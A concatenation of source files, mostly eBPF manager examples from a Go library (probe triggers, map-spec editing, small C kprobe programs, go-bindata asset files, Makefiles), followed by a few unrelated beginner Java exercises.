return bytes.NewReader(buf)
}
// trigger - Generate some network traffic to trigger the probe
func trigger() {
logrus.Println("Generating some network traffic to trigger the probes ...")
_, _ = http.Get("https://www.google.com/")
}
<|start_filename|>manager/examples/mapspec_editor/main.go<|end_filename|>
package main
import (
"github.com/sirupsen/logrus"
"golang.org/x/sys/unix"
"math"
"github.com/DataDog/ebpf"
"github.com/DataDog/ebpf/manager"
)
var m = &manager.Manager{}
func main() {
options := manager.Options{
MapSpecEditors: map[string]manager.MapSpecEditor{
"cache": manager.MapSpecEditor{
Type: ebpf.LRUHash,
MaxEntries: 1000000,
EditorFlag: manager.EditMaxEntries | manager.EditType,
},
},
RLimit: &unix.Rlimit{
Cur: math.MaxUint64,
Max: math.MaxUint64,
},
}
// Initialize the manager
if err := m.InitWithOptions(recoverAssets(), options); err != nil {
logrus.Fatal(err)
}
logrus.Println("successfully loaded, checkout the parameters of the map \"cache\" using bpftool")
wait()
// Close the manager
if err := m.Stop(manager.CleanAll); err != nil {
logrus.Fatal(err)
}
}
<|start_filename|>manager/examples/map_rewrite_vs_map_router/ebpf/prog1.c<|end_filename|>
#include "include/bpf.h"
#include "include/bpf_map.h"
#include "include/bpf_helpers.h"
// shared_cache - This map will be shared with other Manager
struct bpf_map_def SEC("maps/shared_cache1") shared_cache1 = {
.type = BPF_MAP_TYPE_HASH,
.key_size = sizeof(u32),
.value_size = sizeof(u32),
.max_entries = 10,
};
// shared_cache2 - This map will be shared with other Manager
struct bpf_map_def SEC("maps/shared_cache2") shared_cache2 = {
.type = BPF_MAP_TYPE_HASH,
.key_size = sizeof(u32),
.value_size = sizeof(u32),
.max_entries = 10,
};
SEC("kretprobe/vfs_mkdir")
int kretprobe_vfs_mkdir(void *ctx)
{
// retrieve the value saved in the cache at key 1
u32 key = 1;
u32 *value = bpf_map_lookup_elem(&shared_cache1, &key);
if (!value) {
bpf_printk("(prog1) shared_cache1 is empty\n");
} else {
bpf_printk("(prog1) shared_cache1 contains %u\n", *value);
}
value = bpf_map_lookup_elem(&shared_cache2, &key);
if (!value) {
bpf_printk("(prog1) shared_cache2 is empty\n");
} else {
bpf_printk("(prog1) shared_cache2 contains %u\n", *value);
}
return 0;
};
char _license[] SEC("license") = "GPL";
__u32 _version SEC("version") = 0xFFFFFFFE;
<|start_filename|>manager/examples/mapspec_editor/ebpf/main.c<|end_filename|>
#include "include/bpf.h"
#include "include/bpf_map.h"
#include "include/bpf_helpers.h"
struct bpf_map_def SEC("maps/cache") cache = {
.type = BPF_MAP_TYPE_HASH,
.key_size = sizeof(u32),
.value_size = sizeof(u32),
.max_entries = 10,
};
char _license[] SEC("license") = "GPL";
__u32 _version SEC("version") = 0xFFFFFFFE;
<|start_filename|>manager/examples/object_pinning/probe.go<|end_filename|>
// Code generated by go-bindata. DO NOT EDIT.
// sources:
// ebpf/bin/probe.o
package main
import (
"bytes"
"compress/gzip"
"fmt"
"io"
"io/ioutil"
"os"
"path/filepath"
"strings"
"time"
)
func bindataRead(data []byte, name string) ([]byte, error) {
gz, err := gzip.NewReader(bytes.NewBuffer(data))
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
var buf bytes.Buffer
_, err = io.Copy(&buf, gz)
clErr := gz.Close()
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
if clErr != nil {
return nil, err
}
return buf.Bytes(), nil
}
type asset struct {
bytes []byte
info fileInfoEx
}
type fileInfoEx interface {
os.FileInfo
MD5Checksum() string
}
type bindataFileInfo struct {
name string
size int64
mode os.FileMode
modTime time.Time
md5checksum string
}
func (fi bindataFileInfo) Name() string {
return fi.name
}
func (fi bindataFileInfo) Size() int64 {
return fi.size
}
func (fi bindataFileInfo) Mode() os.FileMode {
return fi.mode
}
func (fi bindataFileInfo) ModTime() time.Time {
return fi.modTime
}
func (fi bindataFileInfo) MD5Checksum() string {
return fi.md5checksum
}
func (fi bindataFileInfo) IsDir() bool {
return false
}
func (fi bindataFileInfo) Sys() interface{} {
return nil
}
var _bindataProbeo = []byte(
"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\xec\x57\x4f\x68\x1c\x55\x18\xff\x66\xb2\xdb\xcd\x6e\x6b\xdc\x4a\x8a\xe9" +
"\xb2\x87\x87\x21\x60\x8b\x4e\xb2\x9b\x2a\x1e\x43\xc0\xf4\x60\x0e\x45\x22\x88\x97\x75\xba\x33\x36\x63\x32\xb3\xcb" +
"\xcc\xa0\x8d\x2b\xe8\x45\x10\x3c\xd8\x8b\x37\xc5\xaa\xd4\xa3\x88\x08\x7b\x11\x1a\xf0\x52\xf0\x12\xd0\x43\x8f\x3d" +
"\x16\x54\xac\x1e\xb4\x87\xe8\xc8\xf7\xfe\xcc\xbe\x7d\xf3\x5e\x93\xec\xad\x34\x0f\x26\x33\xdf\xef\x7d\xdf\xfb\x7d" +
"\xef\x7b\xdf\xf7\xbd\xcd\x7b\x2f\xae\xaf\xd9\x96\x05\x62\x58\xf0\x0f\x8c\xa4\xd1\xf8\xf0\xf1\xd1\xf7\x0a\xff\x7b" +
"\x06\x2c\x18\x5a\x40\xf5\xbb\x8d\xfd\x0c\xd1\x9b\x5f\x32\x9d\x8a\x0d\xb0\x9f\x65\xd9\x9c\xb2\xd8\x07\xc0\xf4\x5f" +
"\x81\xd3\x54\x46\xfb\x1a\x00\x6c\x35\xee\x52\x7b\xd4\x0f\x12\xe2\xe3\x77\xd8\x4f\x77\x06\x8d\x3b\x39\xee\x9d\x23" +
"\x21\x7e\xbb\xfd\x16\x19\x34\x6e\xe7\xf8\xd3\xe1\x96\x87\xdf\x41\x4c\x16\x06\x8d\x3d\xe6\xc7\x17\xdc\x0f\x0b\x60" +
"\x2f\xcb\xb2\xa1\x0d\xd0\x40\xbe\x29\xc6\x8f\x7e\x9c\x00\x80\x32\x3c\x99\xfb\x81\x23\x69\xfc\x95\x09\xd9\xab\xa1" +
"\x5f\xf7\x72\x1e\xb2\xe0\x11\xca\x9f\x22\xcf\xc8\xdf\x6e\x2f\x4a\x29\x1e\x44\xc9\xa4\xfe\xba\x25\xc6\xef\xde\xd8" +
"\x37\xfa\x3f\xaf\xf1\x7f\xc8\xe3\xfa\x09\x7f\x3f\x8c\xe7\x61\x3f\xe4\xe7\x61\x1f\xe1\x3c\x50\x3e\x4f\xe5\xfb\x47" +
"\x3c\x9f\xf9\x7c\x3d\xb7\xdf\xaa\x75\xa5\xfd\x8a\x38\x04\x11\x09\xe5\xfd\x46\x57\xc8\x02\x7e\x7b\xc4\x4d\xe5\xfd" +
"\x92\x20\x4a\xf0\xdb\x8f\xd3\x40\xec\x97\xe2\xb1\x4f\xe3\x46\x16\xbc\x73\x83\xc6\x2d\x4d\x7c\x70\x9d\xdd\x6c\xfc" +
"\x7c\x7e\xcb\x4c\x71\xda\xe5\x71\x7a\x56\xca\xdb\x61\x89\xed\x5f\xc4\x4b\xdd\xff\xcd\xaf\xb8\x3c\x05\x70\x5f\x13" +
"\x8f\x61\x69\x14\x17\x9b\xe6\xcb\xd9\x3c\x2e\x5e\xaf\x06\x5d\x29\x3f\x36\x83\xe8\x0a\xdd\x4f\xda\x23\x72\x7e\xf8" +
"\xb1\xff\x0c\xc5\xa3\x5e\x2a\xc7\x2b\xf6\x5d\xba\xcf\x1d\x92\x6e\x8e\xc5\xcb\x73\x59\x3e\x11\x77\x7b\xd2\x78\xe9" +
"\xe2\x72\x61\x82\x7a\x7e\x94\xf3\xc7\x3e\xce\x1f\x6d\xfe\x3c\xa8\xff\xe0\xf6\x4b\xfc\xa9\xc1\xf1\x90\xc7\x71\x6c" +
"\xcc\xe3\xe2\xa5\x75\xf8\x2f\xcb\x32\xcc\x45\xbc\x17\xf1\xee\xc4\x7b\x13\x7f\x0b\xe0\xef\x00\x11\x2f\x75\x1e\xef" +
"\x5e\xbc\x77\xb1\xa7\xe0\xbd\xec\x29\x81\x65\xfa\x6e\x8a\xb9\x4f\xad\x82\x28\xc1\x3e\x82\xbd\x86\x5b\x10\xec\x43" +
"\xd8\xa3\xb4\xfa\x9e\x9b\x62\x1d\x61\xad\x61\x9d\x61\x2d\x62\x1d\x62\xad\x62\x9d\x62\x0d\x7f\xfe\xab\x05\x73\xca" +
"\x7e\x68\x1b\x90\x27\x4a\xd2\x33\x0d\x00\x75\x06\xd7\x85\xfe\x3b\x2f\xc3\xf4\xbb\x27\xad\x53\x58\x93\xfc\x11\xe3" +
"\x9a\xd4\x53\x9a\xc0\xea\x50\x37\x27\xe6\x37\x24\x79\xc5\x2e\xce\xa7\x0f\x98\x37\x8d\x1f\xa8\xeb\x7f\x66\x2a\x3e" +
"\x4f\xf9\xa7\xe0\x96\x82\xff\x0b\x0c\x7f\x5f\xf5\x8f\xca\xe5\x82\xfe\xdf\xc0\x70\x55\xff\x0c\x95\x2b\xb0\xa9\xe0" +
"\x7f\x00\xc3\x97\x14\xff\x67\xa8\x5e\xb5\xa0\x7f\x17\x18\xae\xea\x33\x2f\xa7\x8a\x20\xc5\xcb\x06\xbc\x62\xc0\xab" +
"\x05\xec\x06\x00\x9c\x86\xc7\x72\x99\x5f\x07\xf0\x29\xc5\x67\x0a\xf8\x9b\x00\xf0\x84\xe4\x8f\x38\xdf\xa7\x28\x5e" +
"\x2e\xe0\xaf\x51\x7c\xe4\x8f\x38\xcf\x3a\xc5\xab\x05\x7c\xd1\x42\xde\x93\x39\xde\xe4\xeb\x54\x29\x7e\xaa\x80\x13" +
"\x2e\xa3\x38\xab\x91\x97\x14\x79\xc5\x3a\xda\x7c\x53\x9a\xc7\x02\x7c\x41\x92\xd1\xcb\x57\x25\x19\xbd\xbb\x2a\xc9" +
"\x34\xaa\x4e\xea\x5f\x4d\xc1\x59\xdd\x58\x73\xf0\x63\x2b\xf6\xd3\x7e\xdc\xbb\xec\x77\x78\x21\xc3\xd6\xb8\xe8\xc4" +
"\xfe\x76\xae\xb4\x38\x86\x8e\x43\xca\x4a\x63\xeb\xe8\x56\x29\xac\x01\x9d\xb7\xfc\x38\x09\x7a\x11\x74\xb6\x83\xae" +
"\x1f\x25\x3e\x55\x71\xfc\xcd\xce\x1b\xb1\x1b\xfa\x10\xba\x41\xe4\x74\xc1\x49\xd2\x38\x75\x2f\x83\x93\xec\x84\xf4" +
"\xbd\xba\xb1\x06\x4e\xdc\xc3\xce\x83\x73\x2d\xa7\xf5\x3c\xac\xaf\xae\x2e\x77\x96\xf1\xd5\x66\xaf\x16\x7b\x2d\x75" +
"\x96\x21\x74\xfb\xc9\x62\xe8\xf6\xdb\x4c\xab\xcd\xb4\xda\x4c\xab\xcd\xb4\xda\xb9\x56\xab\x90\xa3\x93\x8c\x1f\x69" +
"\xbe\x17\xc7\x25\x9e\xd2\x17\x94\xfa\x53\xff\xc7\xb7\xf8\x73\x42\xc1\x57\x0c\x7c\x25\x45\xfe\xf8\x00\x7b\xb5\x2f" +
"\x4e\x2b\x7a\x1f\xd1\x6e\x50\x1c\xdf\xf2\x52\x15\x7d\x79\x96\xef\x53\xd8\x0b\xfc\x25\x03\xff\x9e\x75\x38\xfe\x8b" +
"\x06\xfe\x5d\x0d\x7f\x59\xc3\x3f\x30\xf0\xbf\xce\x0f\x45\xed\xeb\x2a\xff\xdb\x06\xfe\x3d\xce\x4f\x24\xfe\x8a\x86" +
"\xff\x39\x03\xff\xf5\xf2\xe1\xf8\x5b\x06\xfe\x7b\x1a\xfe\xaa\x86\xff\x3c\xff\x3f\x45\xcd\xc1\x3b\xbc\x15\x36\x95" +
"\xf8\xab\xf9\x53\x32\xd8\xef\x4f\x1f\xce\xfe\x6b\xd0\xdb\xcf\xd5\xf4\xfa\x6a\xfe\x7f\x66\xb0\x6f\x1a\xec\x55\xf9" +
"\x36\xb7\x6f\x2b\x38\xe1\xf6\xdf\x2b\x78\x5d\xf1\xe3\x67\x8d\x4f\x38\x7e\xe1\xf6\x67\x0f\xf0\xbf\x62\xb0\xff\x9d" +
"\xdb\x93\x03\xec\xbf\xe3\x98\x7a\x1d\xd7\xf9\xd5\x74\x4d\xc1\xd5\xfc\xf9\xc6\x90\x3f\x75\xde\x7f\x44\x1f\x98\xa5" +
"\xf7\x60\x31\x7f\x7e\xd2\x70\xe3\xb8\xce\xf9\xeb\xf6\xc8\xef\x19\xc9\x5e\xfc\x2e\xfb\x3f\x00\x00\xff\xff\x00\xd3" +
"\xf3\x3f\xc8\x14\x00\x00")
func bindataProbeoBytes() ([]byte, error) {
return bindataRead(
_bindataProbeo,
"/probe.o",
)
}
func bindataProbeo() (*asset, error) {
bytes, err := bindataProbeoBytes()
if err != nil {
return nil, err
}
info := bindataFileInfo{
name: "/probe.o",
size: 5320,
md5checksum: "",
mode: os.FileMode(420),
modTime: time.Unix(1594314963, 0),
}
a := &asset{bytes: bytes, info: info}
return a, nil
}
//
// Asset loads and returns the asset for the given name.
// It returns an error if the asset could not be found or
// could not be loaded.
//
func Asset(name string) ([]byte, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err)
}
return a.bytes, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// MustAsset is like Asset but panics when Asset would return an error.
// It simplifies safe initialization of global variables.
// nolint: deadcode
//
func MustAsset(name string) []byte {
a, err := Asset(name)
if err != nil {
panic("asset: Asset(" + name + "): " + err.Error())
}
return a
}
//
// AssetInfo loads and returns the asset info for the given name.
// It returns an error if the asset could not be found or could not be loaded.
//
func AssetInfo(name string) (os.FileInfo, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err)
}
return a.info, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// AssetNames returns the names of the assets.
// nolint: deadcode
//
func AssetNames() []string {
names := make([]string, 0, len(_bindata))
for name := range _bindata {
names = append(names, name)
}
return names
}
//
// _bindata is a table, holding each asset generator, mapped to its name.
//
var _bindata = map[string]func() (*asset, error){
"/probe.o": bindataProbeo,
}
//
// AssetDir returns the file names below a certain
// directory embedded in the file by go-bindata.
// For example if you run go-bindata on data/... and data contains the
// following hierarchy:
// data/
// foo.txt
// img/
// a.png
// b.png
// then AssetDir("data") would return []string{"foo.txt", "img"}
// AssetDir("data/img") would return []string{"a.png", "b.png"}
// AssetDir("foo.txt") and AssetDir("notexist") would return an error
// AssetDir("") will return []string{"data"}.
//
func AssetDir(name string) ([]string, error) {
node := _bintree
if len(name) != 0 {
cannonicalName := strings.Replace(name, "\\", "/", -1)
pathList := strings.Split(cannonicalName, "/")
for _, p := range pathList {
node = node.Children[p]
if node == nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
}
}
if node.Func != nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
rv := make([]string, 0, len(node.Children))
for childName := range node.Children {
rv = append(rv, childName)
}
return rv, nil
}
type bintree struct {
Func func() (*asset, error)
Children map[string]*bintree
}
var _bintree = &bintree{Func: nil, Children: map[string]*bintree{
"": {Func: nil, Children: map[string]*bintree{
"probe.o": {Func: bindataProbeo, Children: map[string]*bintree{}},
}},
}}
// RestoreAsset restores an asset under the given directory
func RestoreAsset(dir, name string) error {
data, err := Asset(name)
if err != nil {
return err
}
info, err := AssetInfo(name)
if err != nil {
return err
}
err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))
if err != nil {
return err
}
err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())
if err != nil {
return err
}
return os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())
}
// RestoreAssets restores an asset under the given directory recursively
func RestoreAssets(dir, name string) error {
children, err := AssetDir(name)
// File
if err != nil {
return RestoreAsset(dir, name)
}
// Dir
for _, child := range children {
err = RestoreAssets(dir, filepath.Join(name, child))
if err != nil {
return err
}
}
return nil
}
func _filePath(dir, name string) string {
cannonicalName := strings.Replace(name, "\\", "/", -1)
return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...)
}
<|start_filename|>testdata/Makefile<|end_filename|>
LLVM_PREFIX ?= /usr/bin
CLANG ?= $(LLVM_PREFIX)/clang
CFLAGS := -target bpf -O2 -g -Wall -Werror $(CFLAGS)
.PHONY: all clean
all: loader-clang-6.0-el.elf loader-clang-7-el.elf loader-clang-8-el.elf loader-clang-9-el.elf rewrite-el.elf invalid_map-el.elf \
loader-clang-6.0-eb.elf loader-clang-7-eb.elf loader-clang-8-eb.elf loader-clang-9-eb.elf rewrite-eb.elf invalid_map-eb.elf
clean:
-$(RM) *.elf
loader-%-el.elf: loader.c
$* $(CFLAGS) -mlittle-endian -c $< -o $@
loader-%-eb.elf: loader.c
$* $(CFLAGS) -mbig-endian -c $< -o $@
%-el.elf: %.c
$(CLANG) $(CFLAGS) -mlittle-endian -c $< -o $@
%-eb.elf : %.c
$(CLANG) $(CFLAGS) -mbig-endian -c $< -o $@
<|start_filename|>manager/examples/tests_and_benchmarks/probe.go<|end_filename|>
// Code generated by go-bindata. DO NOT EDIT.
// sources:
// ebpf/bin/probe.o
package main
import (
"bytes"
"compress/gzip"
"fmt"
"io"
"io/ioutil"
"os"
"path/filepath"
"strings"
"time"
)
func bindataRead(data []byte, name string) ([]byte, error) {
gz, err := gzip.NewReader(bytes.NewBuffer(data))
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
var buf bytes.Buffer
_, err = io.Copy(&buf, gz)
clErr := gz.Close()
if err != nil {
return nil, fmt.Errorf("Read %q: %v", name, err)
}
if clErr != nil {
return nil, err
}
return buf.Bytes(), nil
}
type asset struct {
bytes []byte
info fileInfoEx
}
type fileInfoEx interface {
os.FileInfo
MD5Checksum() string
}
type bindataFileInfo struct {
name string
size int64
mode os.FileMode
modTime time.Time
md5checksum string
}
func (fi bindataFileInfo) Name() string {
return fi.name
}
func (fi bindataFileInfo) Size() int64 {
return fi.size
}
func (fi bindataFileInfo) Mode() os.FileMode {
return fi.mode
}
func (fi bindataFileInfo) ModTime() time.Time {
return fi.modTime
}
func (fi bindataFileInfo) MD5Checksum() string {
return fi.md5checksum
}
func (fi bindataFileInfo) IsDir() bool {
return false
}
func (fi bindataFileInfo) Sys() interface{} {
return nil
}
var _bindataProbeo = []byte(
"\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\xff\xec\x55\xbb\x6b\x14\x61\x10\xff\xed\xdd\x25\x39\x63\x88\xa7\x88\xc4\xe3" +
"\x84\x25\x12\x2b\xd9\x3c\xf0\x05\x5a\x84\x40\x62\x73\x85\x68\xd2\x09\xcb\x7a\xb7\x49\x0e\x73\x0f\x76\x37\x7a\x31" +
"\x82\x36\x82\x9d\x36\x8a\x8d\x18\xad\x52\xd8\xc7\x2e\xff\x42\x4a\x0b\x8b\x94\x82\x4d\xac\x6c\x82\x9f\xcc\xb7\xb3" +
"\xb7\x9b\xb9\x5d\x03\xd6\x0e\xec\xcd\x37\xbf\x9b\xdf\x3c\xbe\x99\xbb\x7d\x36\x5f\x5d\xc8\x19\x06\x22\x31\xf0\x0b" +
"\xb1\x15\xcb\xea\x40\x7c\x9e\xe5\xcf\x53\x30\xb0\x63\x40\xfb\xd7\xca\x87\x8a\xd0\xdd\x4f\xa1\xcf\x50\x0e\x38\x54" +
"\x4a\x8d\x89\x60\x2f\x10\xfa\x2f\x61\x44\xdb\xc4\x1f\x06\xf0\xb0\xfc\x4d\x45\x76\xdd\x09\x9c\x5a\xf9\xab\xb6\x89" +
"\xdf\x6a\x9b\x01\x9d\x5d\x3f\x30\x37\xcb\x7b\x61\x9e\x8f\x9c\xc7\x00\xf6\x94\x52\x3b\x39\x60\x94\xe3\x0f\x02\x18" +
"\x40\xa5\x17\x9f\xc4\xc9\x15\x42\xcd\x7d\xac\x0c\x84\x75\xec\xde\x63\x3b\x0f\x98\x00\x1e\xb3\xbe\x70\xf1\x9c\xa8" +
"\xef\xa0\x57\xcf\x65\x73\xa5\x4d\xe7\xc0\x9c\xa8\x6f\x96\xbf\xf7\xf0\x46\xab\xb3\x1e\xe3\xfb\x3d\xdc\x9c\xa8\x53" +
"\x48\x2c\xb7\x3d\x73\x33\xd1\x97\xdb\xed\xb8\x74\xae\x05\x6e\x3d\xea\xcb\x29\x70\xbd\xf9\xf0\x90\xd6\xe7\x78\xa2" +
"\x4f\x8a\xa3\x94\x52\xd1\xfd\xee\x96\x42\xfd\x86\xed\x1c\x00\x8a\x54\xe4\xf3\x7f\x89\x85\xf6\x8a\x76\x8a\xf6\x6d" +
"\x98\x31\x9a\x09\xcd\x83\x66\x46\xf3\xa2\x99\xd2\x3c\x69\xe6\xa4\x87\x71\xfb\x4e\x15\xc0\x6f\xa5\xd4\x87\x1f\x06" +
"\xc6\x44\x4c\xbd\x6e\xc9\x2f\x0a\x89\x87\x86\xc0\xf3\x29\x45\xfe\x4f\xee\xa2\xf8\xf4\xa4\x41\xbf\x86\x31\x7e\x22" +
"\xd9\x4a\xfb\x21\x0a\x99\xd7\xa1\x7f\x2a\x89\xbf\xd5\x9f\x79\x6c\x09\xfc\x15\xe3\xcf\x45\xec\x97\x8c\xbf\x4e\xc9" +
"\x99\x47\xbe\x0f\xb3\x00\x9c\xd6\x0d\xc5\x6d\x92\x4c\x68\xfc\x44\x1f\x4e\x7d\x9d\x49\xc4\x89\x7a\x73\xb4\x7f\xfc" +
"\xe7\x52\x61\xdc\x64\x9b\x4c\x8a\x56\x49\xd8\xda\xdb\x0a\xdc\x6e\x00\x6b\x6e\x71\xc1\xd2\x07\xcf\x5d\xeb\xd6\x3b" +
"\x93\xcd\x0d\x7b\x79\xbd\x55\xb3\x69\xb0\xb0\x1f\xb9\x9e\xdf\x68\xb7\x60\xaf\x35\x6a\x6e\xcb\x77\xb5\x9b\xe5\xae" +
"\xda\xcb\x9e\xd3\x74\xd1\x74\x1a\x2d\xab\x06\xcb\x0f\xbc\xc0\x79\x00\xcb\xdf\x68\x92\x6e\x3a\x1d\xff\x48\x20\x9b" +
"\x36\x44\xe7\x82\xe5\xb5\xc9\x20\xca\xb4\x35\x7d\x0d\xd5\xb9\xb9\x29\xfb\x6a\xa8\xae\x84\x6a\x46\x38\xf5\x5f\xe8" +
"\x3f\x48\x55\xcf\xa1\x5f\xbe\xf0\x05\x7f\x16\xb8\x1c\xa3\xc1\xcf\xa0\xc0\x67\x33\xf2\x15\x84\x7d\xf6\x18\xbe\xdc" +
"\xd5\xa2\xf0\x2b\xf1\x1c\xa5\xbc\x2b\xc4\xdf\x93\x8c\x72\x9f\x45\x1c\xc5\xef\x73\x7e\x79\x07\xfb\x9c\xb7\x62\xfc" +
"\xbd\xfe\xf7\xcc\x9f\x11\xf8\x61\x2e\xce\x9b\x14\x43\xe8\x6e\x06\xbf\xc4\x05\x8d\x4b\x5c\xf0\x27\x33\xea\x9f\xc9" +
"\xa7\xd7\x2b\xe7\x77\x29\x83\x7f\x23\x83\x2f\x6d\x3f\x25\x26\xc9\x2d\xe6\x9f\x3f\x26\xff\x50\x06\x7f\x89\xf9\xe6" +
"\x31\xfc\x9b\x8c\xc9\x77\x50\x97\xf9\x53\x02\x97\xfb\x73\x3d\x63\x7f\xb6\x53\xf6\x67\x24\x65\x7f\x16\x33\xde\x7f" +
"\xdb\x9c\xff\x20\x51\xf7\x60\x82\x1f\xfd\x1f\xff\x09\x00\x00\xff\xff\xc9\x46\x04\x2f\x28\x09\x00\x00")
func bindataProbeoBytes() ([]byte, error) {
return bindataRead(
_bindataProbeo,
"/probe.o",
)
}
func bindataProbeo() (*asset, error) {
bytes, err := bindataProbeoBytes()
if err != nil {
return nil, err
}
info := bindataFileInfo{
name: "/probe.o",
size: 2344,
md5checksum: "",
mode: os.FileMode(420),
modTime: time.Unix(1594298158, 0),
}
a := &asset{bytes: bytes, info: info}
return a, nil
}
//
// Asset loads and returns the asset for the given name.
// It returns an error if the asset could not be found or
// could not be loaded.
//
func Asset(name string) ([]byte, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("Asset %s can't read by error: %v", name, err)
}
return a.bytes, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// MustAsset is like Asset but panics when Asset would return an error.
// It simplifies safe initialization of global variables.
// nolint: deadcode
//
func MustAsset(name string) []byte {
a, err := Asset(name)
if err != nil {
panic("asset: Asset(" + name + "): " + err.Error())
}
return a
}
//
// AssetInfo loads and returns the asset info for the given name.
// It returns an error if the asset could not be found or could not be loaded.
//
func AssetInfo(name string) (os.FileInfo, error) {
cannonicalName := strings.Replace(name, "\\", "/", -1)
if f, ok := _bindata[cannonicalName]; ok {
a, err := f()
if err != nil {
return nil, fmt.Errorf("AssetInfo %s can't read by error: %v", name, err)
}
return a.info, nil
}
return nil, &os.PathError{Op: "open", Path: name, Err: os.ErrNotExist}
}
//
// AssetNames returns the names of the assets.
// nolint: deadcode
//
func AssetNames() []string {
names := make([]string, 0, len(_bindata))
for name := range _bindata {
names = append(names, name)
}
return names
}
//
// _bindata is a table, holding each asset generator, mapped to its name.
//
var _bindata = map[string]func() (*asset, error){
"/probe.o": bindataProbeo,
}
//
// AssetDir returns the file names below a certain
// directory embedded in the file by go-bindata.
// For example if you run go-bindata on data/... and data contains the
// following hierarchy:
// data/
// foo.txt
// img/
// a.png
// b.png
// then AssetDir("data") would return []string{"foo.txt", "img"}
// AssetDir("data/img") would return []string{"a.png", "b.png"}
// AssetDir("foo.txt") and AssetDir("notexist") would return an error
// AssetDir("") will return []string{"data"}.
//
func AssetDir(name string) ([]string, error) {
node := _bintree
if len(name) != 0 {
cannonicalName := strings.Replace(name, "\\", "/", -1)
pathList := strings.Split(cannonicalName, "/")
for _, p := range pathList {
node = node.Children[p]
if node == nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
}
}
if node.Func != nil {
return nil, &os.PathError{
Op: "open",
Path: name,
Err: os.ErrNotExist,
}
}
rv := make([]string, 0, len(node.Children))
for childName := range node.Children {
rv = append(rv, childName)
}
return rv, nil
}
type bintree struct {
Func func() (*asset, error)
Children map[string]*bintree
}
var _bintree = &bintree{Func: nil, Children: map[string]*bintree{
"": {Func: nil, Children: map[string]*bintree{
"probe.o": {Func: bindataProbeo, Children: map[string]*bintree{}},
}},
}}
// RestoreAsset restores an asset under the given directory
func RestoreAsset(dir, name string) error {
data, err := Asset(name)
if err != nil {
return err
}
info, err := AssetInfo(name)
if err != nil {
return err
}
err = os.MkdirAll(_filePath(dir, filepath.Dir(name)), os.FileMode(0755))
if err != nil {
return err
}
err = ioutil.WriteFile(_filePath(dir, name), data, info.Mode())
if err != nil {
return err
}
return os.Chtimes(_filePath(dir, name), info.ModTime(), info.ModTime())
}
// RestoreAssets restores an asset under the given directory recursively
func RestoreAssets(dir, name string) error {
children, err := AssetDir(name)
// File
if err != nil {
return RestoreAsset(dir, name)
}
// Dir
for _, child := range children {
err = RestoreAssets(dir, filepath.Join(name, child))
if err != nil {
return err
}
}
return nil
}
func _filePath(dir, name string) string {
cannonicalName := strings.Replace(name, "\\", "/", -1)
return filepath.Join(append([]string{dir}, strings.Split(cannonicalName, "/")...)...)
}
<|start_filename|>internal/btf/testdata/Makefile<|end_filename|>
# Usage: make KDIR=/path/to/foo
vmlinux-btf.gz: $(KDIR)/vmlinux
objcopy --dump-section .BTF=/dev/stdout "$<" | gzip > "$@"
<|start_filename|>manager/examples/object_pinning/utils.go<|end_filename|>
package main
import (
"bytes"
"io"
"os"
"github.com/pkg/errors"
"github.com/sirupsen/logrus"
)
// recoverAssets - Recover ebpf asset
func recoverAssets() io.ReaderAt {
buf, err := Asset("/probe.o")
if err != nil {
logrus.Fatal(errors.Wrap(err, "couldn't find asset"))
}
return bytes.NewReader(buf)
}
// trigger - Creates and then removes a tmp folder to trigger the probes
func trigger() error {
logrus.Println("Generating events to trigger the probes ...")
// Creating a tmp directory to trigger the probes
tmpDir := "/tmp/test_folder"
logrus.Printf("creating %v", tmpDir)
err := os.MkdirAll(tmpDir, 0666)
if err != nil {
return err
}
// Removing a tmp directory to trigger the probes
logrus.Printf("removing %v", tmpDir)
return os.RemoveAll(tmpDir)
}
| achntrl/ebpf |
<|start_filename|>4_semestre/teste_de_software/atividade_avaliacao_1/src/aula/Pessoa.java<|end_filename|>
package aula;
public class Pessoa {
public String nome;
@Override
public boolean equals(Object o) {
Pessoa p = (Pessoa) o;
return p.nome == this.nome;
}
}
<|start_filename|>4_semestre/teste_de_software/aula_1/src/aula/Operacao.java<|end_filename|>
package aula;
public class Operacao {
public double potencia(int a, int b) {
return Math.pow(a, b);
}
public double divisao(int a, int b) {
return a / b;
}
}
<|start_filename|>3_semestre/programacao_orientada_a_objetos/codigos/for_e_for_each/for/FoorDois.java<|end_filename|>
import java.util.*;
public class FoorDois{
public static void main(String[] args){
int[] a = {1,2,3,4,5};
for(int i = 0; i < a.length; i += 2)
System.out.println(a[i]);
}
}
<|start_filename|>3_semestre/programacao_orientada_a_objetos/codigos/primitivos/Primitivo.java<|end_filename|>
import java.util.*;
public class Primitivo{
public static void main(String[] args){
int a = 123;
int b = a;
a = 321;
System.out.println("Valor de a: " + a + "\nValor de b: " + b);
}
}
<|start_filename|>3_semestre/programacao_orientada_a_objetos/codigos/estatico/Principal.java<|end_filename|>
public class Principal{
public static void main(String[] args){
System.out.println(Calculadora.soma(1.0,2.0));
}
}
